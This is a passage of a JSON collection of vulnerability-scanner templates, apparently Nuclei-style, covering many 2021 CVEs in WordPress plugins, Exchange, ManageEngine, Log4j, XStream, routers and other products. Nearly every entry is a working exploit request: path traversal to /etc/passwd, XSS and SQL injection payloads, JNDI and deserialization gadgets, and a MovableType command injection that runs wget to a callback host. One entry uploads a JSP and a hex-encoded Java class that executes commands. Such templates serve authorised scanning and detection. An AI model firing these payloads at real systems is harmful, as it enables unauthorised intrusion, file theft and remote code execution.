(SSRF)","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/registry/machine?app={{rand_base(5)}}&appType=0&version=0&hostname={{rand_base(5)}}&ip={{interactsh-url}}&port=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","words":["\"success\":true","\"msg\":\"success\""],"condition":"and"}]}]},{"id":"CVE-2021-25864","info":{"name":"Hue Magic 3.0.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/hue/assets/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24342","info":{"name":"WordPress JNews Theme <8.0.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /?ajax-request=jnews HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nlang=en_US&cat_id=6\"></script><script>alert(document.domain)</script>&action=jnews_build_mega_category_2&number=6&tags=70%2C64%2C10%2C67\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["Content-Type: text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41349","info":{"name":"Microsoft Exchange Server Pre-Auth POST Based Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /autodiscover/autodiscover.json HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n%3Cscript%3Ealert%28document.domain%29%3B+a=%22%3C%2Fscript%3E&x=1\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["alert(document.domain);","a=\"\""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"word","negative":true,"words":["A potentially dangerous Request.Form value was detected from the client"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-24991","info":{"name":"WooCommerce PDF Invoices & Packing Slips WordPress Plugin < 2.10.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=wpo_wcpdf_options_page&section=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\" style=animation-name:rotation onanimationstart=alert(document.domain) x","WooCommerce PDF Invoices"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46068","info":{"name":"Vehicle Service Management System - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /classes/Users.php?f=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid=1&firstname=Administrator%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&lastname=Admin&username=admin\n","GET /admin/?page=user HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"Administrator\\\"><script>alert(document.domain)</script> Admin\")"],"condition":"and"}]}]},{"id":"CVE-2021-40960","info":{"name":"Galera WebTemplate 1.0 Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/GallerySite/filesrc/fotoilan/388/middle//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20837","info":{"name":"MovableType - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<methodCall>\n  <methodName>mt.handler_to_coderef</methodName>\n  <params>\n    <param>\n      <value>\n        <base64>\n          {{base64(\"`wget http://{{interactsh-url}}`\")}}\n        </base64>\n      </value>\n    </param>\n  </params>\n</methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","words":["failed loading package"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25075","info":{"name":"WordPress Duplicate Page or Post <1.5.1 - Cross-Site Scripting","severity":"low"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\naction=wpdevart_duplicate_post_parametrs_save_in_db&title_prefix=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28%2fXSS%2f%29+p\n","GET /wp-admin/admin.php?page=wpda_duplicate_post_menu HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["style=animation-name:rotation onanimationstart=alert(/XSS/) p","toplevel_page_wpda_duplicate_post_menu"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40539","info":{"name":"Zoho ManageEngine ADSelfService Plus v6113 - Unauthenticated Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /./RestAPI/LogonCustomization HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=8b1ab266c41afb773af2e064bc526458\n\n--8b1ab266c41afb773af2e064bc526458\nContent-Disposition: form-data; name=\"methodToCall\"\n\nunspecified\n--8b1ab266c41afb773af2e064bc526458\nContent-Disposition: form-data; name=\"Save\"\n\nyes\n--8b1ab266c41afb773af2e064bc526458\nContent-Disposition: form-data; name=\"form\"\n\nsmartcard\n--8b1ab266c41afb773af2e064bc526458\nContent-Disposition: form-data; name=\"operation\"\n\nAdd\n--8b1ab266c41afb773af2e064bc526458\nContent-Disposition: form-data; name=\"CERTIFICATE_PATH\"; filename=\"ws.jsp\"\n\n<%@ page import=\"java.util.*,java.io.*\"%>\n<%@ page import=\"java.security.MessageDigest\"%>\n<%\nString cve = \"CVE-2021-40539\";\nMessageDigest alg = MessageDigest.getInstance(\"MD5\");\nalg.reset();\nalg.update(cve.getBytes());\nbyte[] digest = alg.digest();\nStringBuffer hashedpasswd = new StringBuffer();\nString hx;\nfor (int i=0;i<digest.length;i++){\n  hx =  Integer.toHexString(0xFF & digest[i]);\n  if(hx.length() == 1){hx = \"0\" + hx;}\n  hashedpasswd.append(hx);\n}\nout.println(hashedpasswd.toString());\n%>\n--8b1ab266c41afb773af2e064bc526458--\n","POST /./RestAPI/LogonCustomization HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=43992a07d9a30213782780204a9f032b\n\n--43992a07d9a30213782780204a9f032b\nContent-Disposition: form-data; name=\"methodToCall\"\n\nunspecified\n--43992a07d9a30213782780204a9f032b\nContent-Disposition: form-data; name=\"Save\"\n\nyes\n--43992a07d9a30213782780204a9f032b\nContent-Disposition: form-data; name=\"form\"\n\nsmartcard\n--43992a07d9a30213782780204a9f032b\nContent-Disposition: form-data; name=\"operation\"\n\nAdd\n--43992a07d9a30213782780204a9f032b\nContent-Disposition: form-data; name=\"CERTIFICATE_PATH\"; filename=\"Si.class\"\n\n{{hex_decode('CAFEBABE0000003400280D0A000C00160D0A0017001807001908001A08001B08001C08001D08001E0D0A0017001F0700200700210700220100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100083C636C696E69743E01000D0A537461636B4D61705461626C6507002001000D0A536F7572636546696C6501000753692E6A6176610C000D0A000E0700230C002400250100106A6176612F6C616E672F537472696E67010003636D640100022F63010004636F707901000677732E6A737001002A2E2E5C776562617070735C61647373705C68656C705C61646D696E2D67756964655C746573742E6A73700C002600270100136A6176612F696F2F494F457863657074696F6E01000253690100106A6176612F6C616E672F4F626A6563740100116A6176612F6C616E672F52756E74696D6501000D0A67657452756E74696D6501001528294C6A6176612F6C616E672F52756E74696D653B01000465786563010028285B4C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F50726F636573733B0021000B000C0000000000020001000D0A000E0001000F0000001D00010001000000052AB70001B10000000100100000000600010000000200080011000E0001000F00000064000500020000002BB800024B2A08BD000359031204535904120553590512065359061207535907120853B600094CA700044BB10001000000260029000D0A00020010000000120004000000050004000600260007002A00080012000000070002690700130000010014000000020015')}}\n--43992a07d9a30213782780204a9f032b--\n","POST /./RestAPI/Connection HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nmethodToCall=openSSLTool&action=generateCSR&KEY_LENGTH=1024+-providerclass+Si+-providerpath+%22..%5Cbin%22\n","GET /help/admin-guide/test.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["114f7ce498a54a1be1de1f1e5731d0ea"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24235","info":{"name":"WordPress Goto Tour & Travel Theme <2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/tour-list/?keywords=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28123%29%3B%3E&start_date=xxxxxxxxxxxx&avaibility=13"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["input/Autofocus/%0D*/Onfocus=alert(123);","goto-tour-list-js-extra"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-36873","info":{"name":"WordPress iQ Block Country <=1.2.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=iq-block-country%2Flibs%2Fblockcountry-settings.php HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/options.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\noption_page=iqblockcountry-settings-group&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Diq-block-country%2Flibs%2Fblockcountry-settings.php&blockcountry_blockmessage=test</textarea><script>alert(document.domain)</script>&blockcountry_redirect=2&blockcountry_redirect_url=&blockcountry_header=on&blockcountry_nrstatistics=15&blockcountry_daysstatistics=30&blockcountry_geoapikey=&blockcountry_apikey=&blockcountry_ipoverride=NONE&blockcountry_debuglogging=on\n","GET /wp-admin/options-general.php?page=iq-block-country%2Flibs%2Fblockcountry-settings.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(header_4, \"text/html\")","status_code_4 == 200","contains(body_4, 'blockcountry_blockmessage\\\">test</textarea><script>alert(document.domain)</script>')","contains(body_4, '<h3>Block type</h3>')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"_wpnonce\" value=\"([0-9a-zA-Z]+)\""],"internal":true}]}]},{"id":"CVE-2021-43495","info":{"name":"AlquistManager Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/asd/../../../../../../../../etc/passwd"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-44138","info":{"name":"Caucho Resin >=4.0.52 <=4.0.56 - Directory traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/;/WEB-INF/web.xml","{{BaseURL}}/resin-doc/;/WEB-INF/resin-web.xml"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<web-app","</web-app>"],"condition":"and"},{"type":"word","part":"header","words":["text/xml","application/xml"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26085","info":{"name":"Atlassian Confluence Server - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/s/{{randstr}}/_/;/WEB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<display-name>Confluence</display-name>","com.atlassian.confluence.setup.ConfluenceAppConfig"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21975","info":{"name":"vRealize Operations Manager API - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST /casa/nodes/thumbprints HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\n\n[\"127.0.0.1:443/ui/\"]\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["vRealize Operations Manager","thumbprint","address"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-32030","info":{"name":"ASUS GT-AC2900 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /appGet.cgi?hook=get_cfg_clientlist() HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: asusrouter--\nReferer: {{BaseURL}}\nCookie: asus_token=\\0Invalid; clickedItem_tab=0\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","words":["get_cfg_clientlist","alias","model_name"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-37833","info":{"name":"Hotel Druid 3.0.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/visualizza_tabelle.php?anno=2021&tipo_tabella=prenotazioni&sel_tab_prenota=tutte&wo03b%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ew5px3=1","{{BaseURL}}/storia_soldi.php?piu17%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ee3esq=1","{{BaseURL}}/tabella.php?jkuh3%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Eyql8b=1","{{BaseURL}}/crea_modelli.php?anno=2021&id_sessione=&fonte_dati_conn=attuali&T_PHPR_DB_TYPE=postgresql&T_PHPR_DB_NAME=%C2%9E%C3%A9e&T_PHPR_DB_HOST=localhost&T_PHPR_DB_PORT=5432&T_PHPR_DB_USER=%C2%9E%C3%A9e&T_PHPR_DB_PASS=%C2%9E%C3%A9e&T_PHPR_LOAD_EXT=NO&T_PHPR_TAB_PRE=%C2%9E%C3%A9e&anno_modello=2021&lingua_modello=en&cambia_frasi=SIipq85%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ef9xkbujgt24&form_availability_calendar_template=1"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21479","info":{"name":"SCIMono <0.0.19 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/Schemas/$%7B''.class.forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('java.lang.Runtime.getRuntime().exec(\"id\")')%7D"],"matchers":[{"type":"word","part":"body","words":["The attribute value","java.lang.UNIXProcess@","has invalid value!","\"status\" : \"400\""],"condition":"and"}]}]},{"id":"CVE-2021-3019","info":{"name":"ffay lanproxy Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../conf/config.properties"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"],"condition":"and"},{"type":"word","part":"body","words":["config.admin.username","config.admin.password"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25114","info":{"name":"WordPress Paid Memberships Pro <2.6.7 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /?rest_route=/pmpro/v1/checkout_level&level_id=3&discount_code=%27%20%20union%20select%20sleep(6)%20--%20g HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/paid-memberships-pro/js/pmpro-checkout.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","contains(header_1, \"application/json\")","status_code == 200","contains(body_2, 'other_discount_code_')"],"condition":"and"}]}]},{"id":"CVE-2021-24358","info":{"name":"Plus Addons for Elementor Page Builder < 4.1.10 - Open Redirect","severity":"medium"},"requests":[{"raw":["GET /?author=1 HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-login.php?action=theplusrp&key=&redirecturl=http://interact.sh&forgoturl=http://interact.sh&login={{username}} HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}],"extractors":[{"type":"regex","name":"username","group":1,"regex":["Author:(?:[A-Za-z0-9 -\\_=\"]+)?<span(?:[A-Za-z0-9 -\\_=\"]+)?>([A-Za-z0-9]+)<\\/span>"],"internal":true,"part":"body"},{"type":"regex","name":"username","group":1,"regex":["ion: https:\\/\\/[a-z0-9.]+\\/author\\/([a-z]+)\\/"],"internal":true,"part":"header"}]}]},{"id":"CVE-2021-40661","info":{"name":"IND780 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/IND780/excalweb.dll?webpage=../../AutoCE.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ExePath=\\Windows","WorkDir=\\Windows"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29505","info":{"name":"XStream <1.4.17 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<java.util.PriorityQueue serialization='custom'>\n    <unserializable-parents/>\n    <java.util.PriorityQueue>\n        <default>\n            <size>2</size>\n        </default>\n        <int>3</int>\n        <javax.naming.ldap.Rdn_-RdnEntry>\n            <type>12345</type>\n            <value class='com.sun.org.apache.xpath.internal.objects.XString'>\n                <m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj>\n            </value>\n        </javax.naming.ldap.Rdn_-RdnEntry>\n        <javax.naming.ldap.Rdn_-RdnEntry>\n            <type>12345</type>\n            <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>\n                <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>\n                    <parsedMessage>true</parsedMessage>\n                    <soapVersion>SOAP_11</soapVersion>\n                    <bodyParts/>\n                    <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>\n                        <attachmentsInitialized>false</attachmentsInitialized>\n                        <nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>\n                            <aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>\n                                <candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>\n                                    <names>\n                                        <string>aa</string>\n                                        <string>aa</string>\n                                    </names>\n                                    <ctx>\n                                        <environment/>\n                                        <registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>\n                                            <java.rmi.server.RemoteObject>\n                                                <string>UnicastRef</string>\n                                                <string>{{interactsh-url}}</string>\n                                                <int>1099</int>\n                                                <long>0</long>\n                                                <int>0</int>\n                                                <long>0</long>\n                                                <short>0</short>\n                                                <boolean>false</boolean>\n                                            </java.rmi.server.RemoteObject>\n                                        </registry>\n                                        <host>{{interactsh-url}}</host>\n                                        <port>1099</port>\n                                    </ctx>\n                                </candidates>\n                            </aliases>\n                        </nullIter>\n                    </sm>\n                </message>\n            </value>\n        </javax.naming.ldap.Rdn_-RdnEntry>\n    </java.util.PriorityQueue>\n</java.util.PriorityQueue>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["timestamp","com.thoughtworks.xstream"],"condition":"or"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-41691","info":{"name":"openSIS Student Information System 8.0 SQL Injection","severity":"high"},"requests":[{"raw":["POST /index.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nUSERNAME={{username}}&PASSWORD={{password}}&language=en&log=\n","POST /TransferredOutModal.php?modfunc=detail HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nstudent_id=updatexml(0x23,concat(1,md5({{num}})),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5\n"],"attack":"pitchfork","payloads":{"username":["student"],"password":["student@123"]},"req-condition":true,"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["contains(body_2, \"<!-- SQL STATEMENT:\") && contains(body_2, \"SELECT COUNT(STUDENT_ID)\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2021-39501","info":{"name":"EyouCMS 1.5.4 Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?m=user&c=Users&a=logout&referurl=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*?)$"]}]}]},{"id":"CVE-2021-45046","info":{"name":"Apache Log4j2 - Remote Code Injection","severity":"critical"},"requests":[{"raw":["GET /?x=${jndi:ldap://127.0.0.1#.${hostName}.{{interactsh-url}}/a} HTTP/1.1\nHost: {{Hostname}}\nAccept: ${jndi:ldap://127.0.0.1#.${hostName}.accept.{{interactsh-url}}}\nAccept-Encoding: ${jndi:ldap://127.0.0.1#.${hostName}.acceptencoding.{{interactsh-url}}}\nAccept-Language: ${jndi:ldap://127.0.0.1#.${hostName}.acceptlanguage.{{interactsh-url}}}\nAccess-Control-Request-Headers: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestheaders.{{interactsh-url}}}\nAccess-Control-Request-Method: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestmethod.{{interactsh-url}}}\nAuthentication: Basic ${jndi:ldap://127.0.0.1#.${hostName}.authenticationbasic.{{interactsh-url}}}\nAuthentication: Bearer ${jndi:ldap://127.0.0.1#.${hostName}.authenticationbearer.{{interactsh-url}}}\nCookie: ${jndi:ldap://127.0.0.1#.${hostName}.cookiename.{{interactsh-url}}}=${jndi:ldap://${hostName}.cookievalue.{{interactsh-url}}}\nLocation: ${jndi:ldap://127.0.0.1#.${hostName}.location.{{interactsh-url}}}\nOrigin: ${jndi:ldap://127.0.0.1#.${hostName}.origin.{{interactsh-url}}}\nReferer: ${jndi:ldap://127.0.0.1#.${hostName}.referer.{{interactsh-url}}}\nUpgrade-Insecure-Requests: ${jndi:ldap://127.0.0.1#.${hostName}.upgradeinsecurerequests.{{interactsh-url}}}\nUser-Agent: ${jndi:ldap://127.0.0.1#.${hostName}.useragent.{{interactsh-url}}}\nX-Api-Version: ${jndi:ldap://127.0.0.1#.${hostName}.xapiversion.{{interactsh-url}}}\nX-CSRF-Token: ${jndi:ldap://127.0.0.1#.${hostName}.xcsrftoken.{{interactsh-url}}}\nX-Druid-Comment: ${jndi:ldap://127.0.0.1#.${hostName}.xdruidcomment.{{interactsh-url}}}\nX-Forwarded-For: ${jndi:ldap://127.0.0.1#.${hostName}.xforwardedfor.{{interactsh-url}}}\nX-Origin: ${jndi:ldap://127.0.0.1#.${hostName}.xorigin.{{interactsh-url}}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"regex","part":"interactsh_request","regex":["\\d{3}\\.\\d{1}\\.\\d{1}\\.\\d{1}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"]}],"extractors":[{"type":"kval","kval":["interactsh_ip"]},{"type":"regex","group":2,"regex":["\\d{3}\\.\\d{1}\\.\\d{1}\\.\\d{1}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"]},{"type":"regex","group":1,"regex":["\\d{3}\\.\\d{1}\\.\\d{1}\\.\\d{1}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"],"part":"interactsh_request"}]}]},{"id":"CVE-2021-35488","info":{"name":"Thruk 2.40-2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/thruk/cgi-bin/login.cgi?thruk/cgi-bin/status.cgi%3fstyle=combined&title=%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["'></script><script>alert(document.domain)</script>","Thruk Monitoring"],"condition":"and"},{"type":"status","status":[401]}]}]},{"id":"CVE-2021-46073","info":{"name":"Vehicle Service Management System 1.0 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /vehicle_service/classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /vehicle_service/classes/Users.php?f=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfirstname=test1%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&lastname=test&username=test&password=test&type=1\n","GET /vehicle_service/admin/?page=user/list HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"<script>alert(document.domain)</script> Test</td>\")"],"condition":"and"}]}]},{"id":"CVE-2021-42887","info":{"name":"TOTOLINK EX1200T 4.1.2cu.5215 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /login.htm HTTP/1.1\nHost: {{Hostname}}\n","GET /formLoginAuth.htm?authCode=1&userName=admin&goURL=&action=login HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["TOTOLINK"]},{"type":"word","part":"header_2","words":["Set-Cookie: SESSION_ID="]},{"type":"status","status":[302]}]}]},{"id":"CVE-2021-27314","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /admin/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&password=test&submit=\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"Doctor Appoinment System\")"],"condition":"and"}]}]},{"id":"CVE-2021-22054","info":{"name":"VMWare Workspace ONE UEM - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/Catalog/BlobHandler.ashx?Url=YQB3AGUAdgAyADoAawB2ADAAOgB4AGwAawBiAEoAbwB5AGMAVwB0AFEAMwB6ADMAbABLADoARQBKAGYAYgBHAE4ATgBDADUARQBBAG0AZQBZAE4AUwBiAFoAVgBZAHYAZwBEAHYAdQBKAFgATQArAFUATQBkAGcAZAByAGMAMgByAEUAQwByAGIAcgBmAFQAVgB3AD0A"],"matchers-condition":"and","matchers":[{"type":"word","words":["Interactsh Server"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-28937","info":{"name":"Acexy Wireless-N WiFi Repeater REV 1.0 - Repeater Password Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/password.html"],"matchers-condition":"and","matchers":[{"type":"word","words":["Password Setting","addCfg('username'","addCfg('newpass'"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-37416","info":{"name":"Zoho ManageEngine ADSelfService Plus <=6103 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/LoadFrame?frame_name=x&src=x&single_signout=x%27%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["></iframe><script>alert(1)</script>","adsf/js/"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40968","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /install.php?page=4 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: 